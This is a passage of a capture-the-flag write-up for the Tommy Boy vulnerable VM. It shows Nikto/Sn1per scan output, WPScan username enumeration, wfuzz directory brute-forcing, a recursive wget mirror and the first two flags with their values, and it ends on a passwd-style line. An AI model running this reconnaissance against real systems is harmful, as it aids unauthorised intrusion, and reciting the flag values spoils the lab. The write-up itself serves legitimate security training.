+ OSVDB-3092: /archive/: This might be interesting...
+ OSVDB-3268: /archivo/: Directory indexing found.
+ OSVDB-3092: /archivo/: This might be interesting...
+ OSVDB-3268: /backup/: Directory indexing found.
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /banca/: Directory indexing found.
+ OSVDB-3092: /banca/: This might be interesting...
+ OSVDB-3268: /banco/: Directory indexing found.
+ OSVDB-3092: /banco/: This might be interesting...
+ OSVDB-3268: /bdata/: Directory indexing found.
+ OSVDB-3092: /bdata/: This might be interesting...
+ OSVDB-3268: /bdatos/: Directory indexing found.
+ OSVDB-3092: /bdatos/: This might be interesting...
+ OSVDB-3268: /beta/: Directory indexing found.
+ OSVDB-3092: /beta/: This might be interesting...
+ OSVDB-3268: /c/: Directory indexing found.
+ OSVDB-3092: /c/: This might be interesting...
+ OSVDB-3268: /caja/: Directory indexing found.
+ OSVDB-3092: /caja/: This might be interesting...
+ OSVDB-3268: /cards/: Directory indexing found.
+ OSVDB-3092: /cards/: This might be interesting...
+ OSVDB-3268: /cart/: Directory indexing found.
+ OSVDB-3092: /cart/: This might be interesting...
+ OSVDB-3268: /cdrom/: Directory indexing found.
+ OSVDB-3092: /cdrom/: This might be interesting...
+ OSVDB-3268: /cert/: Directory indexing found.
+ OSVDB-3092: /cert/: This might be interesting...
+ OSVDB-3268: /cliente/: Directory indexing found.
+ OSVDB-3092: /cliente/: This might be interesting...
+ OSVDB-3268: /compra/: Directory indexing found.
+ OSVDB-3092: /compra/: This might be interesting...
+ OSVDB-3268: /compras/: Directory indexing found.
+ OSVDB-3092: /compras/: This might be interesting...
+ OSVDB-3268: /compressed/: Directory indexing found.
+ OSVDB-3092: /compressed/: This might be interesting...
+ OSVDB-3268: /conecta/: Directory indexing found.
+ OSVDB-3092: /conecta/: This might be interesting...
+ OSVDB-3268: /counter/: Directory indexing found.
+ OSVDB-3268: /cuenta/: Directory indexing found.
+ OSVDB-3092: /cuenta/: This might be interesting...
+ OSVDB-3268: /cuentas/: Directory indexing found.
+ OSVDB-3092: /cuentas/: This might be interesting...
+ OSVDB-3268: /dato/: Directory indexing found.
+ OSVDB-3092: /dato/: This might be interesting...
+ OSVDB-3268: /db/: Directory indexing found.
+ OSVDB-3092: /db/: This might be interesting...
+ OSVDB-3268: /demo/: Directory indexing found.
+ OSVDB-3092: /demo/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /devel/: Directory indexing found.
+ OSVDB-3092: /devel/: This might be interesting...
+ OSVDB-3268: /directory/: Directory indexing found.
+ OSVDB-3092: /directory/: This might be interesting...
+ OSVDB-3268: /down/: Directory indexing found.
+ OSVDB-3092: /down/: This might be interesting...
+ OSVDB-3268: /download/: Directory indexing found.
+ OSVDB-3092: /download/: This might be interesting...
+ OSVDB-3268: /downloads/: Directory indexing found.
+ OSVDB-3092: /downloads/: This might be interesting...
+ OSVDB-3268: /ejemplo/: Directory indexing found.
+ OSVDB-3092: /ejemplo/: This might be interesting...
+ OSVDB-3268: /ejemplos/: Directory indexing found.
+ OSVDB-3092: /ejemplos/: This might be interesting...
+ OSVDB-3268: /envia/: Directory indexing found.
+ OSVDB-3092: /envia/: This might be interesting...
+ OSVDB-3268: /file/: Directory indexing found.
+ OSVDB-3092: /file/: This might be interesting...
+ OSVDB-3268: /fileadmin/: Directory indexing found.
+ OSVDB-3092: /fileadmin/: This might be interesting...
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3268: /foto/: Directory indexing found.
+ OSVDB-3092: /foto/: This might be interesting...
+ OSVDB-3268: /graphics/: Directory indexing found.
+ OSVDB-3092: /graphics/: This might be interesting...
+ OSVDB-3268: /guestbook/: Directory indexing found.
+ OSVDB-3092: /guestbook/: This might be interesting...
+ OSVDB-3268: /guests/: Directory indexing found.
+ OSVDB-3092: /guests/: This might be interesting...
+ OSVDB-3268: /hidden/: Directory indexing found.
+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3268: /home/: Directory indexing found.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3268: /homepage/: Directory indexing found.
+ OSVDB-3092: /homepage/: This might be interesting...
+ OSVDB-3268: /import/: Directory indexing found.
+ OSVDB-3092: /import/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /informacion/: Directory indexing found.
+ OSVDB-3092: /informacion/: This might be interesting...
+ OSVDB-3268: /ingresa/: Directory indexing found.
+ OSVDB-3092: /ingresa/: This might be interesting...
+ OSVDB-3268: /ingreso/: Directory indexing found.
+ OSVDB-3092: /ingreso/: This might be interesting...
+ OSVDB-3268: /internal/: Directory indexing found.
+ OSVDB-3092: /internal/: This might be interesting...
+ OSVDB-3268: /intranet/: Directory indexing found.
+ OSVDB-3092: /intranet/: This might be interesting...
+ OSVDB-3268: /invitado/: Directory indexing found.
+ OSVDB-3092: /invitado/: This might be interesting...
+ OSVDB-3268: /invitados/: Directory indexing found.
+ OSVDB-3092: /invitados/: This might be interesting...
+ OSVDB-3268: /java/: Directory indexing found.
+ OSVDB-3092: /java/: This might be interesting...
+ OSVDB-3268: /job/: Directory indexing found.
+ OSVDB-3092: /job/: This might be interesting...
+ OSVDB-3268: /jrun/: Directory indexing found.
+ OSVDB-3092: /jrun/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3268: /library/: Directory indexing found.
+ OSVDB-3092: /library/: This might be interesting...
+ OSVDB-3268: /linux/: Directory indexing found.
+ OSVDB-3092: /linux/: This might be interesting...
+ OSVDB-3268: /logfiles/: Directory indexing found.
+ OSVDB-3092: /logfiles/: This might be interesting...
+ OSVDB-3268: /logger/: Directory indexing found.
+ OSVDB-3092: /logger/: This might be interesting...
+ OSVDB-3268: /login/: Directory indexing found.
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /movimientos/: Directory indexing found.
+ OSVDB-3092: /movimientos/: This might be interesting...
+ OSVDB-3268: /mp3/: Directory indexing found.
+ OSVDB-3092: /mp3/: This might be interesting...
+ OSVDB-3268: /mqseries/: Directory indexing found.
+ OSVDB-3092: /mqseries/: This might be interesting...
+ OSVDB-3268: /old/: Directory indexing found.
+ OSVDB-3092: /old/: This might be interesting...
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /private/: Directory indexing found.
+ OSVDB-3092: /private/: This might be interesting...
+ OSVDB-3268: /prueba/: Directory indexing found.
+ OSVDB-3092: /prueba/: This might be interesting...
+ OSVDB-3268: /pruebas/: Directory indexing found.
+ OSVDB-3092: /pruebas/: This might be interesting...
+ OSVDB-3268: /publica/: Directory indexing found.
+ OSVDB-3092: /publica/: This might be interesting...
+ OSVDB-3268: /publico/: Directory indexing found.
+ OSVDB-3092: /publico/: This might be interesting...
+ OSVDB-3268: /purchase/: Directory indexing found.
+ OSVDB-3092: /purchase/: This might be interesting...
+ OSVDB-3268: /register/: Directory indexing found.
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3268: /registered/: Directory indexing found.
+ OSVDB-3092: /registered/: This might be interesting...
+ OSVDB-3268: /reports/: Directory indexing found.
+ OSVDB-3092: /reports/: This might be interesting...
+ OSVDB-3268: /root/: Directory indexing found.
+ OSVDB-3268: /save/: Directory indexing found.
+ OSVDB-3092: /save/: This might be interesting...
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /server_stats/: Directory indexing found.
+ OSVDB-3268: /servicio/: Directory indexing found.
+ OSVDB-3092: /servicio/: This might be interesting...
+ OSVDB-3268: /shop/: Directory indexing found.
+ OSVDB-3092: /shop/: This might be interesting...
+ OSVDB-3268: /source/: Directory indexing found.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3268: /ssi/: Directory indexing found.
+ OSVDB-3268: /staff/: Directory indexing found.
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3268: /stat/: Directory indexing found.
+ OSVDB-3092: /stat/: This might be interesting...
+ OSVDB-3268: /Statistics/: Directory indexing found.
+ OSVDB-3092: /Statistics/: This might be interesting...
+ OSVDB-3268: /statistics/: Directory indexing found.
+ OSVDB-3092: /statistics/: This might be interesting...
+ OSVDB-3268: /Stats/: Directory indexing found.
+ OSVDB-3092: /Stats/: This might be interesting...
+ OSVDB-3268: /store/: Directory indexing found.
+ OSVDB-3092: /store/: This might be interesting...
+ OSVDB-3268: /stylesheets/: Directory indexing found.
+ OSVDB-3092: /stylesheets/: This might be interesting...
+ OSVDB-3268: /subir/: Directory indexing found.
+ OSVDB-3092: /subir/: This might be interesting...
+ OSVDB-3268: /sys/: Directory indexing found.
+ OSVDB-3092: /sys/: This might be interesting...
+ OSVDB-3268: /system/: Directory indexing found.
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3268: /temp/: Directory indexing found.
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3268: /template/: Directory indexing found.
+ OSVDB-3092: /template/: This may be interesting as the directory may hold sensitive files or reveal system information.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3268: /tests/: Directory indexing found.
+ OSVDB-3092: /tests/: This might be interesting...
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /trabajo/: Directory indexing found.
+ OSVDB-3092: /trabajo/: This might be interesting...
+ OSVDB-3268: /transito/: Directory indexing found.
+ OSVDB-3092: /transito/: This might be interesting...
+ OSVDB-3268: /user/: Directory indexing found.
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3268: /ustats/: Directory indexing found.
+ OSVDB-3092: /ustats/: This might be interesting...
+ OSVDB-3268: /usuario/: Directory indexing found.
+ OSVDB-3092: /usuario/: This might be interesting...
+ OSVDB-3268: /vfs/: Directory indexing found.
+ OSVDB-3092: /vfs/: This might be interesting...
+ OSVDB-3092: /web/: This might be interesting...
+ OSVDB-3268: /webadmin/: Directory indexing found.
+ OSVDB-3092: /webadmin/: This might be interesting...may be HostingController, www.hostingcontroller.com
+ OSVDB-3268: /webboard/: Directory indexing found.
+ OSVDB-3092: /webboard/: This might be interesting...
+ OSVDB-3268: /webcart/: Directory indexing found.
+ OSVDB-3092: /webcart/: This might be interesting...
+ OSVDB-3268: /webdata/: Directory indexing found.
+ OSVDB-3092: /webdata/: This might be interesting...
+ OSVDB-3268: /work/: Directory indexing found.
+ OSVDB-3092: /work/: This might be interesting...
+ OSVDB-3268: /wwwlog/: Directory indexing found.
+ OSVDB-3092: /wwwlog/: This might be interesting...
+ OSVDB-3092: /webcgi/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-sys/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgibin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-win/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /fcgi-bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-exe/: This might be interesting... possibly a system shell found.
+ OSVDB-3268: /market/: Directory indexing found.
+ OSVDB-17670: /market/: Site Server sample files.  This might be interesting.
+ OSVDB-3268: /databases/: Directory indexing found.
+ OSVDB-3092: /databases/: Databases? Really??
+ OSVDB-3092: /manager/: May be a web server or site manager.
+ OSVDB-3268: /search/: Directory indexing found.
+ OSVDB-3268: /a/: Directory indexing found.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3268: /image/: Directory indexing found.
+ OSVDB-3268: /perl/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3268: /style/: Directory indexing found.
+ OSVDB-3268: /jsp-examples/: Directory indexing found.
+ OSVDB-3268: /pdfs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /ad/: Directory indexing found.
+ OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
+ OSVDB-3268: /ar/: Directory indexing found.
+ OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
+ OSVDB-3268: /au/: Directory indexing found.
+ OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
+ OSVDB-3268: /bb/: Directory indexing found.
+ OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
+ OSVDB-3268: /cn/: Directory indexing found.
+ OSVDB-3092: /cn/: This might be interesting... potential country code (China)
+ OSVDB-3268: /fr/: Directory indexing found.
+ OSVDB-3092: /fr/: This might be interesting... potential country code (France)
+ OSVDB-3268: /gr/: Directory indexing found.
+ OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
+ OSVDB-3268: /in/: Directory indexing found.
+ OSVDB-3092: /in/: This might be interesting... potential country code (India)
+ OSVDB-3268: /id/: Directory indexing found.
+ OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
+ OSVDB-3268: /im/: Directory indexing found.
+ OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
+ OSVDB-3268: /it/: Directory indexing found.
+ OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
+ OSVDB-3268: /jp/: Directory indexing found.
+ OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
+ OSVDB-3268: /my/: Directory indexing found.
+ OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
+ OSVDB-3268: /me/: Directory indexing found.
+ OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
+ OSVDB-3268: /ms/: Directory indexing found.
+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
+ OSVDB-3268: /ps/: Directory indexing found.
+ OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
+ OSVDB-3268: /bl/: Directory indexing found.
+ OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
+ OSVDB-3268: /st/: Directory indexing found.
+ OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
+ OSVDB-3268: /configuration/: Directory indexing found.
+ /configuration/: Admin login page/section found.
+ OSVDB-3268: /sysadmin/: Directory indexing found.
+ /sysadmin/: Admin login page/section found.
+ OSVDB-3268: /servlets-examples/: Directory indexing found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ OSVDB-3268: /cms/: Directory indexing found.
+ OSVDB-3092: /cms/: This might be interesting...
+ OSVDB-3268: /phpMyAdmin/: Directory indexing found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3268: /home/?vhelp: Directory indexing found.
+ OSVDB-3268: /snoop/: Directory indexing found.
+ OSVDB-3268: /debug/: Directory indexing found.
+ /debug/: Possible debug directory/program found.
+ OSVDB-3268: /~ftp/: Directory indexing found.
+ OSVDB-637: /~ftp/: Allowed to browse ftp user's home directory.
+ OSVDB-3268: /webmail/?admin: Directory indexing found.
+ 14027 requests: 0 error(s) and 348 item(s) reported on remote host
+ End Time:           2016-10-02 23:46:17 (GMT2) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.18) are not in
      the Nikto database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
no
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 
 + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
[+] Screenshot saved to /usr/share/sniper/loot/192.168.1.23-port80.jpg
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 111 closed... skipping.
 + -- --=[Port 135 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 closed... skipping.
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 2049 closed... skipping.
 + -- --=[Port 2121 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3310 closed... skipping.
 + -- --=[Port 3128 closed... skipping.
 + -- --=[Port 3389 closed... skipping.
 + -- --=[Port 3632 closed... skipping.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5800 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 6000 closed... skipping.
 + -- --=[Port 6667 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8100 closed... skipping.
 + -- --=[Port 8080 closed... skipping.
 + -- --=[Port 8180 closed... skipping.
 + -- --=[Port 8443 closed... skipping.
 + -- --=[Port 8888 closed... skipping.
 + -- --=[Port 10000 closed... skipping.
 + -- --=[Port 49152 closed... skipping.
 + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
yasuo.rb:25:in `require': cannot load such file -- nmap/program (LoadError)
    from yasuo.rb:25:in `<main>'
 + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[Sorting loot directory (/usr/share/sniper/loot)
 + -- --=[Generating reports...
 + -- --=[Opening loot directory...
 + -- --=[Done!
 + -- ----------------------------=[Done]=------------------------------------ -- +


That is quite some output. The webservice looks like a sieve. SSH has been checked for some standard logins and came up empty. I don’t have any verified users at the moment so starting a brute-force now seems an unnecessary waste. First I’ll check what the links are in the robots.txt

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt


These lead to 3 images and flag 1. The 3 images render no useful information just lulz.

» Flag #1

This is the first of five flags in the Callhan Auto server.  You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Sn1per also hints at a couple of comments in the source of the home-page.

<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget?  Thanks-->


The amount of directory listings found actually bugs me. I check some of the dirs but find no content. So it’s just a big empty website.
Following the youtube link we get our next destination: prehistoricforest/. But it gives me the following error:

Error establishing a database connection


I started this VM late last night and when I encountered this error I was trying all sort of things to see what could’ve caused this – if the error was by design or not and I got tired and called it quits. So when I booted up the whole shabang the next day the console for TommyBoy changed from orange to plain white. Hmmkay…

tommyboot2

Let’s check…

blog

Couldn’t have said it better myself. I did reboot the VM, but a reboot of the ESX 6 host solved the issue. Strange behaviour that maybe due to the hardware version conversion. But now that we have the blog up and running we can have a dig for that sensitive info. Run WPScan first.

[*] exec: wpscan --url http://192.168.1.23/prehistoricforest/ --enumerate u

_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.1.23/prehistoricforest/
[+] Started: Tue Oct  4 19:46:25 2016

[!] The WordPress 'http://192.168.1.23/prehistoricforest/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://192.168.1.23/prehistoricforest/xmlrpc.php
[!] Includes directory has directory listing enabled: http://192.168.1.23/prehistoricforest/wp-includes/

[+] WordPress version 4.5.4 identified from advanced fingerprinting (Released on 2016-09-07)

[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2
 |  Location: http://192.168.1.23/prehistoricforest/wp-content/themes/twentysixteen/
 |  Readme: http://192.168.1.23/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.3
 |  Style URL: http://192.168.1.23/prehistoricforest/wp-content/themes/twentysixteen/style.css
 |  Theme Name: Twenty Sixteen
 |  Theme URI: https://wordpress.org/themes/twentysixteen/
 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+

[+] Finished: Tue Oct  4 19:46:29 2016
[+] Requests Done: 53
[+] Memory used: 15.539 MB
[+] Elapsed time: 00:00:04


Very interesting – it found 4 users. Keep that for later. Moving on with the rest that is on there. First post on the site:

 1 thought on “SON OF A!”

    richard says:	
    July 7, 2016 at 6:04 pm
    Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory.
    Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.


So we get another dir to look at. But first I want to finish looking at this site.
I find a password protected post and Flag #2! Yay me!1!

Sad company news

I am deeply saddened to report that our company’s president, Tom Callahan, has passed away.
I’ve been informed that while this blog appears to be working fine, the main site where customers place orders is down.  I will be working with Michelle and Tommy to restore this ASAP.
Thanks for your patience in this matter.

Sincerely,
Richard
 1 thought on “Announcing the Callahan internal company blog!”

    Michelle Michelle says:	
    July 7, 2016 at 8:21 pm
    Well put boss 😉

    Flag #2: thisisthesecondflagyayyou.txt

» Flag #2

You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

Imma do a wfuzz on the site with the names I have so far.

[*] exec: wfuzz -c -w /root/hacking/TB/users.lst --hc=404 http://192.168.1.23/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.23/FUZZ
Total requests: 5

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00001:  C=301      9 L	      28 W	    312 Ch	  "tommy"
00002:  C=301      9 L	      28 W	    314 Ch	  "richard"
00003:  C=301      9 L	      28 W	    315 Ch	  "michelle"
00004:  C=301      9 L	      28 W	    311 Ch	  "nick"

Total time: 0.139456
Processed Requests: 5
Filtered Requests: 1
Requests/sec.: 35.85334


The dirs that contain info are “tommy” and “richard”. In fact I believe that the “michelle” and “nick” dirs are fakes – and together with what we found earlier are some form of fuzz protection.
In fact let’s fuzz it with rockyou.txt. Ye, look at it go.

[*] exec: wfuzz -c -w /usr/share/wordlists/rockyou.txt --hc=404 http://192.168.1.23/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.23/FUZZ
Total requests: 14344392

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00001:  C=301      9 L	      28 W	    313 Ch	  "123456"
00006:  C=301      9 L	      28 W	    313 Ch	  "andrew"
00009:  C=301      9 L	      28 W	    313 Ch	  "flower"
00010:  C=301      9 L	      28 W	    314 Ch	  "playboy"
00012:  C=301      9 L	      28 W	    316 Ch	  "elizabeth"
00016:  C=301      9 L	      28 W	    315 Ch	  "samantha"
00017:  C=301      9 L	      28 W	    314 Ch	  "chelsea"
00019:  C=301      9 L	      28 W	    313 Ch	  "daniel"
00021:  C=301      9 L	      28 W	    313 Ch	  "111111"
00022:  C=301      9 L	      28 W	    314 Ch	  "matthew"
00023:  C=301      9 L	      28 W	    315 Ch	  "iloveyou"
00024:  C=301      9 L	      28 W	    315 Ch	  "jonathan"
00029:  C=301      9 L	      28 W	    314 Ch	  "brandon"
00030:  C=301      9 L	      28 W	    314 Ch	  "1234567"
00031:  C=301      9 L	      28 W	    315 Ch	  "princess"
00034:  C=301      9 L	      28 W	    313 Ch	  "family"
00038:  C=301      9 L	      28 W	    313 Ch	  "dragon"
00039:  C=301      9 L	      28 W	    313 Ch	  "joseph"
00040:  C=301      9 L	      28 W	    313 Ch	  "sweety"
00041:  C=301      9 L	      28 W	    315 Ch	  "danielle"
00044:  C=301      9 L	      28 W	    313 Ch	  "lauren"
00047:  C=301      9 L	      28 W	    313 Ch	  "yellow"
00048:  C=301      9 L	      28 W	    313 Ch	  "mickey"
00050:  C=301      9 L	      28 W	    313 Ch	  "alexis"
00052:  C=301      9 L	      28 W	    313 Ch	  "junior"
00053:  C=301      9 L	      28 W	    313 Ch	  "summer"
00056:  C=301      9 L	      28 W	    314 Ch	  "william"
00060:  C=301      9 L	      28 W	    315 Ch	  "poohbear"
00062:  C=301      9 L	      28 W	    313 Ch	  "angela"
00063:  C=301      9 L	      28 W	    314 Ch	  "patrick"
00064:  C=301      9 L	      28 W	    316 Ch	  "alexander"
00065:  C=301      9 L	      28 W	    313 Ch	  "adrian"
00070:  C=301      9 L	      28 W	    314 Ch	  "richard"
00071:  C=301      9 L	      28 W	    313 Ch	  "monica"
00079:  C=301      9 L	      28 W	    315 Ch	  "carolina"
00081:  C=301      9 L	      28 W	    313 Ch	  "steven"
00082:  C=301      9 L	      28 W	    313 Ch	  "louise"
00083:  C=301      9 L	      28 W	    313 Ch	  "shorty"
00084:  C=301      9 L	      28 W	    313 Ch	  "tigger"
00088:  C=301      9 L	      28 W	    313 Ch	  "nathan"
00089:  C=301      9 L	      28 W	    313 Ch	  "killer"
00090:  C=301      9 L	      28 W	    313 Ch	  "buster"
00091:  C=301      9 L	      28 W	    313 Ch	  "snoopy"
00093:  C=301      9 L	      28 W	    315 Ch	  "12345678"
00094:  C=301      9 L	      28 W	    313 Ch	  "sandra"
00096:  C=301      9 L	      28 W	    314 Ch	  "gabriel"
00099:  C=301      9 L	      28 W	    313 Ch	  "george"
[....]
56489:  C=301      9 L	      28 W	    311 Ch	  "nick jonas"
56802:  C=301      9 L	      28 W	    313 Ch	  "imagen"
56954:  C=301      9 L	      28 W	    313 Ch	  "euclid"
57284:  C=301      9 L	      28 W	    313 Ch	  "arriba"
57375:  C=301      9 L	      28 W	    311 Ch	  "5683"
57725:  C=200     17 L	     176 W	   1176 Ch	  "#1dancer"
57726:  C=200     17 L	     176 W	   1176 Ch	  "######"
58071:  C=301      9 L	      28 W	    313 Ch	  "perfil"
58349:  C=301      9 L	      28 W	    315 Ch	  "kingfish"
58557:  C=301      9 L	      28 W	    313 Ch	  "guides"
58719:  C=301      9 L	      28 W	    312 Ch	  "cutie pie"
58735:  C=301      9 L	      28 W	    315 Ch	  "front242"
58946:  C=301      9 L	      28 W	    311 Ch	  "alex#1"
59537:  C=301      9 L	      28 W	    312 Ch	  "wendi"
59784:  C=301      9 L	      28 W	    311 Ch	  "rain"
59823:  C=301      9 L	      28 W	    311 Ch	  "pete"
59980:  C=301      9 L	      28 W	    310 Ch	  "max"
60035:  C=301      9 L	      28 W	    313 Ch	  "loveme?"
60041:  C=301      9 L	      28 W	    313 Ch	  "love??"
60074:  C=301      9 L	      28 W	    314 Ch	  "logical"
60313:  C=301      9 L	      28 W	    312 Ch	  "guess?"
60440:  C=301      9 L	      28 W	    314 Ch	  "display"
60538:  C=301      9 L	      28 W	    315 Ch	  "contacts"
60698:  C=301      9 L	      28 W	    313 Ch	  "aztecs"
61041:  C=400     10 L	      35 W	    304 Ch	  "100%me"
61619:  C=301      9 L	      28 W	    313 Ch	  "ocelot"
61797:  C=301      9 L	      28 W	    312 Ch	  "lucky#7"
61873:  C=301      9 L	      28 W	    312 Ch	  "laser"
62129:  C=301      9 L	      28 W	    311 Ch	  "gary"
62161:  C=301      9 L	      28 W	    313 Ch	  "fozzie"
62194:  C=301      9 L	      28 W	    313 Ch	  "estate"
62201:  C=301      9 L	      28 W	    312 Ch	  "extra"
62313:  C=301      9 L	      28 W	    314 Ch	  "cowboys#1"
62500:  C=301      9 L	      28 W	    314 Ch	  "bacchus"
63378:  C=301      9 L	      28 W	    313 Ch	  "simple plan"
63401:  C=301      9 L	      28 W	    311 Ch	  "sexy me"
63423:  C=301      9 L	      28 W	    316 Ch	  "signature"
63477:  C=301      9 L	      28 W	    312 Ch	  "quest"
^CInterrupt: use the 'exit' command to quit

No bueno. Lets move on for now and see if we can find out how this is done later on.
I wget -r -nH --no-parent --reject "index.*" http://192.168.1.23/tommy/ -P /root/hacking/TB/loot/web/ everything local and find 2 files.

--2016-10-03 17:56:57--  http://192.168.1.23/tommy/hi
Reusing existing connection to 192.168.1.23:80.
HTTP request sent, awaiting response... 200 OK
Length: 0
Saving to: ‘/root/hacking/TB/loot/web/tommy/hi’
--2016-10-03 17:56:57--  http://192.168.1.23/tommy/hi.txt
Reusing existing connection to 192.168.1.23:80.
HTTP request sent, awaiting response... 200 OK
Length: 1564 (1.5K) [text/plain]


File “hi” is a 0 byte file, but the “hi.txt” is kinda helpful.

root:x:0:0:root:/root:/bin/bash
